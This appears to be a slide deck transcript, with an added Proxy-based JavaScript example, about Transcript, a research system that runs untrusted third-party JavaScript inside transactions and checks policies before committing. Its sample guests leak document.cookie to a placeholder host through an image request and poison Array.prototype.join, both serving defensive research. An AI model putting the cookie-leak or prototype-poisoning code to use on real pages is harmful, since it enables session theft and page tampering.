Enhancing JavaScript with Transactions. Mohan Dhawan†, Chung-chieh Shan‡ and Vinod Ganapathy†. †Department of Computer Science, Rutgers University; ‡School of Informatics and Computing, Indiana University.
Enhancing JavaScript with Transactions
Mohan Dhawan†, Chung-chieh Shan‡ and Vinod Ganapathy†
†Department of Computer Science, Rutgers University
‡School of Informatics and Computing, Indiana University
ECOOP 2012 (slide deck dated November 24, 2015)

Problem
Web applications include third party content.
Examples: widgets, advertisements, libraries.
These may contain untrusted, malicious JavaScript.

Example from nytimes.com
A rogue third party advertisement displayed an image of a fake virus scan.
Client security and privacy were at risk.

Solution: Transcript
Extend JavaScript to support transactions.
Execute untrusted content speculatively inside a transaction.
Commit its changes to the Web application only after policy enforcement.

Goal
Protect the Web application from security-violating actions of untrusted JavaScript.
Must handle arbitrary third party code written in JavaScript, including constructs such as eval, this and with.
Must enforce powerful security policies, for example:
    Allow pop-ups from white-listed websites only.
    Disallow innerHTML in the context of the host Web application.

Contributions
JavaScript transactions: speculative execution of unmodified third party JavaScript code.
Transaction suspend/resume: allows the host Web application to mediate external actions such as DOM and AJAX operations.
Speculative DOM updates.

Schematic use of Transcript

    // Web application code
    var tx = transaction{
        ...
        // unmodified 3rd party code
        ...
    };
    // Introspection block goes below
    /* policy enforcement code */
    // validate actions of the transaction
    tx.commit();
    // Rest of the Web application code

The transaction block holds the guest; everything outside it is the host Web application.

Example: Untrusted code

    // Web application code
    var tx = transaction{
        var image = document.createElement("img");
        var url = "
        var params = document.cookie;
        image.src = url + "?cookie=" + params;
        document.body.appendChild(image);
        ...
        Array.prototype.join = function() { return "evilString"; };
    };

The guest leaks the host's cookie through an image request and poisons Array.prototype.join for the whole page.

Transcript runtime system

Web application code:

    tx = transaction {
        ...
        body.appendChild(image);
        ...
    };
    do {
        ...
        tx = tx.resume();
        ...
    } while (tx.isSuspended());
    tx.commit();
    // Rest of the Web application

Animated diagram (recovered captions; the figure itself is not in the transcript):
1. Transcript clones the host's DOM (DOM orig to DOM TX) when the transaction starts; the call stack holds the web app frames followed by the 3rd party frames.
2. On a transaction suspend, the Transcript runtime saves (i) the read/write sets, (ii) the speculative DOM, and (iii) the stack frames up to the nearest transaction delimiter to create a Transaction object (tx).
3. The Transcript runtime loads the saved read/write sets and stack frames when the transaction resumes.
4. In the introspection block, the host performs the action (appendChild) on behalf of the guest; the image is recorded in tx's write set (Heap orig to Heap new, DOM TX to DOM' TX).

Transaction suspend and resume

    var tx = transaction{
        ...
        document.body.appendChild(image);
    };
    do {
        var rs = tx.getReadSet(), arg = tx.getArgs();
        switch (tx.getCause()) {
            case "appendChild":
                // obj: the node the guest called appendChild on (document.body here)
                if (arg[0].nodeName.match("IMG") && !rs.checkMembership(document, "cookie"))
                    obj.appendChild(arg[0]);
                break;
        } /* end switch */
        tx = tx.resume();
    } while (tx.isSuspended());

Policy: the host performs the appendChild on the guest's behalf only if the node is an image and the guest has not read document.cookie; otherwise the call is dropped and the transaction simply resumes.

Read and Write Sets

    var tx = transaction{
        ...
        Array.prototype.join = function() { return "evilString"; };
    };
    /* Introspection code */
    var ws = tx.getWriteSet();
    if (ws.checkMembership(Array.prototype, "*")) {
        to_commit = false;
    }
    // Rest of the web application code

Policy: any write to Array.prototype (the "*" wildcard matches every property) prevents the transaction from being committed.
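The three slides above (the untrusted-code example, suspend/resume mediation of appendChild, and write-set inspection before commit) can be approximated in plain JavaScript without the transaction keyword. The block below is an added example written for this page, not Transcript's own code: it uses an ES2015 Proxy to log reads, buffer writes and intercept external operations, with a constructed stand-in DOM (document, body, createElement) and a stand-in prototype object ArrayProto. Function names (runTransaction, hostRun, appendChildPolicy), the EXTERNAL_OPS set and the example.invalid URLs are assumptions of this example; a real transaction would suspend the guest's stack rather than call the host synchronously as done here.

```javascript
'use strict';

// External operations Transcript suspends on (DOM/AJAX calls). In this userland
// approximation the host's introspection callback runs synchronously at the call.
const EXTERNAL_OPS = new Set(['appendChild']);

// Run `guest` speculatively against `world`: every property read is logged in the
// read set, every write is buffered in the write set, and external operations are
// mediated by introspect({cause, args, readSet}), which returns true to allow them.
function runTransaction(guest, world, introspect) {
  const readSet = new Set();    // "path.prop" keys the guest read
  const writeSet = new Map();   // "path.prop" -> {target, prop, value}
  const suspensions = [];       // {cause, allowed}, in call order
  const rawOf = new WeakMap();  // proxy -> underlying object
  const unwrap = (x) => (rawOf.has(x) ? rawOf.get(x) : x);
  const wrapIfObject = (v, key) => (v !== null && typeof v === 'object' ? wrap(v, key) : v);

  function wrap(target, path) {
    const proxy = new Proxy(target, {
      get(t, prop) {
        if (typeof prop === 'symbol') return t[prop];
        const key = path + '.' + String(prop);
        readSet.add(key);
        // Reads see the transaction's own buffered writes (speculative state).
        if (writeSet.has(key)) return wrapIfObject(writeSet.get(key).value, key);
        const v = t[prop];
        if (typeof v !== 'function') return wrapIfObject(v, key);
        return (...args) => {
          const raw = args.map(unwrap);
          if (!EXTERNAL_OPS.has(prop)) return wrapIfObject(v.apply(t, raw), key + '()');
          // "Suspend": the host inspects the call and performs it itself if allowed.
          const allowed = introspect({ cause: prop, args: raw, readSet });
          suspensions.push({ cause: prop, allowed });
          return allowed ? v.apply(t, raw) : undefined;
        };
      },
      set(t, prop, value) {
        // Buffer the write; the real object is untouched until commit().
        writeSet.set(path + '.' + String(prop), { target: t, prop, value: unwrap(value) });
        return true;
      },
    });
    rawOf.set(proxy, target);
    return proxy;
  }

  // The guest gets proxied globals as parameters, standing in for the unmodified
  // global scope a real transaction{} block would see.
  guest(...Object.keys(world).map((k) => wrap(world[k], k)));

  return {
    getReadSet: () => new Set(readSet),
    getWriteSet: () => new Set(writeSet.keys()),
    getSuspensions: () => suspensions.slice(),
    commit() { // apply buffered writes to the real objects
      for (const { target, prop, value } of writeSet.values()) target[prop] = value;
      return writeSet.size;
    },
  };
}

// Constructed stand-in for the host's DOM plus a prototype the guest may try to poison.
function makeWorld() {
  return {
    document: {
      cookie: 'sid=constructed-secret',
      body: { children: [], appendChild(node) { this.children.push(node); return node; } },
      createElement(tag) { return { nodeName: tag.toUpperCase(), src: '' }; },
    },
    ArrayProto: { join() { return 'joined'; } },
  };
}

// Policy from the suspend/resume slide: an appended node must be an IMG and the
// guest must not have read document.cookie before appending it.
function appendChildPolicy({ cause, args, readSet }) {
  return cause === 'appendChild' && /IMG/.test(args[0].nodeName) &&
         !readSet.has('document.cookie');
}

// Host side: run the guest, inspect the write set (read/write sets slide) and
// commit only if the prototype object was left alone.
function hostRun(guest) {
  const world = makeWorld();
  const tx = runTransaction(guest, world, appendChildPolicy);
  const touchedProto = [...tx.getWriteSet()].some((k) => k.startsWith('ArrayProto.'));
  const committed = !touchedProto;
  if (committed) tx.commit();
  const first = world.document.body.children[0];
  return {
    committed,
    appended: world.document.body.children.length,
    firstSrc: first ? first.src : null,
    joinResult: world.ArrayProto.join(),
    cookieRead: tx.getReadSet().has('document.cookie'),
    suspensions: tx.getSuspensions(),
  };
}

// Guest from the untrusted-code slide (the URL is a constructed placeholder).
function leakyWidget(document, ArrayProto) {
  const image = document.createElement('img');
  const url = 'http://example.invalid/collect';
  image.src = url + '?cookie=' + document.cookie;
  document.body.appendChild(image);
  ArrayProto.join = function () { return 'evilString'; };
}

// Well-behaved guest: no cookie read, no prototype write, so it commits.
function benignWidget(document) {
  const image = document.createElement('img');
  image.src = 'http://example.invalid/logo.png';
  document.body.appendChild(image);
}
```

Running hostRun(leakyWidget) denies the appendChild (cookie already in the read set), leaves the prototype's join untouched and never commits; hostRun(benignWidget) performs the append, commits the buffered src assignment, and the real body then holds one image. The buffered-write design is what gives the host its decision point: nothing the guest wrote reaches the real objects until the introspection code has looked at the write set.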

Gluing

    var tx = transaction{
        ...
        document.write('<script src="newcode.js">');
    };
    // Introspection block
    // Rest of the web application code

Code that the guest pulls in through document.write is glued into the same transaction as the guest that wrote it.

Implementation
Prototype implementation in Firefox 3.7a4.
Added new JavaScript features: the transaction keyword and the Transaction object.
Modified SpiderMonkey op-codes to log all object accesses and to suspend on DOM / AJAX calls.
Added speculative execution support for DOM operations: all node accesses are redirected to the cloned copy.

Evaluation
Goals:
    Study the applicability of Transcript in isolating real guest code.
    Measure the performance impact on guest code and micro-benchmarks.
    Demonstrate graceful recovery in the presence of malicious and buggy guests.
Methodology:
    Isolated the guest code in a Web application using transactions.
    The introspection block for each transaction enforced a number of general and domain-specific policies.

Applicability of Transcript
Applied Transcript to five JavaScript widgets and applications, both stand-alone and library based. No difference in behavior or functionality was observed.

    Benchmark        Policy
    JS Menu          No network or cookie access
    Picture Puzzle   Disallow attaching key event handlers
    Spell Checker    No XMLHttpRequest if cookies were read
    GreyBox          iframes to whitelisted URLs only
    Color Picker     No innerHTML in host's context

Performance: Application benchmarks
(Bar chart not preserved in the transcript.) Overhead = 0.16s.

Performance: Microbenchmarks (function calls)

    Microbenchmark                            Overhead
    Native functions
      eval("if (true) true; false;")          6.87x
      fn.call(this, i)                        1.89x
    External operations
      getElementById("checkbox")              6.78x
      createElement("div")                    3.69x
      addEventListener("click", clk, false)   26.51x
      dispatchEvent(evt)                      1.20x
      document.write(" x = 1; ")              2.01x
      document.write(" Hi ")                  1.26x

Performance: Microbenchmarks (JavaScript events)
Average overhead of just 94 µs per event.

    Event name                          Normalized overhead   Raw delay (µs)
    Drag event (drag)                   1.71x                 97
    Keyboard event (keypress)           1.16x                 150
    Message event (message)             1.17x                 85
    Mouse event (click)                 1.54x                 86
    Mouse event (mouseover)             2.05x                 88
    Mutation event (DOMAttrModified)    2.14x                 88
    UI Event (overflow)                 1.97x                 61

Recovery: Clickjacking

    document.write(' Goto Amazon ');
    ...
    document.write(' Goto Amazon ');

(The HTML markup inside the written strings is not preserved in the transcript.)

Related Work
Staged information flow in JavaScript (PLDI'09): hybrid framework for JavaScript with the aim of protecting Web applications from untrusted code.
ConScript (S&P'10): aspect-oriented framework to specify and enforce fine-grained security policies for Web applications.
AdJail (Security'10): isolation mechanism to protect Web application content from malicious advertisements.
Caja, FBJS, AdSafe, etc.

Conclusion
Transcript implements JavaScript transactions to provide isolation and recovery:
    Operations that break isolation are suspended, and resumed only if the Web application allows them.
Enforcement of powerful security policies:
    All data reads / writes are recorded.
    Reads / writes can be inspected before commit.
No restrictions on, or changes to, third party code.

Questions?

Event handler wrapper generation

    var tx = transaction{
        ...
        node.addEventListener("click", handler, false);
    };
    // Introspection block

Transcript rewrites the registration so that each firing of the handler runs in its own transaction, checked by the same introspection block:

    tx_handler = function(evt) {
        evt_tx = transaction { handler(evt); };
        iblock_func(evt_tx);
    };
    var tx = transaction{
        ...
        node.addEventListener("click", tx_handler, false);
    };
    // Introspection block

A complete example

    (function () {
        var to_commit = true, e = eval; // indirect eval
        var tx = transaction{ e(getFunctionBody(menu)); };
        do {
            ...
            tx = tx.resume();
        } while (tx.isSuspended());
        if (to_commit) tx.commit();
    })();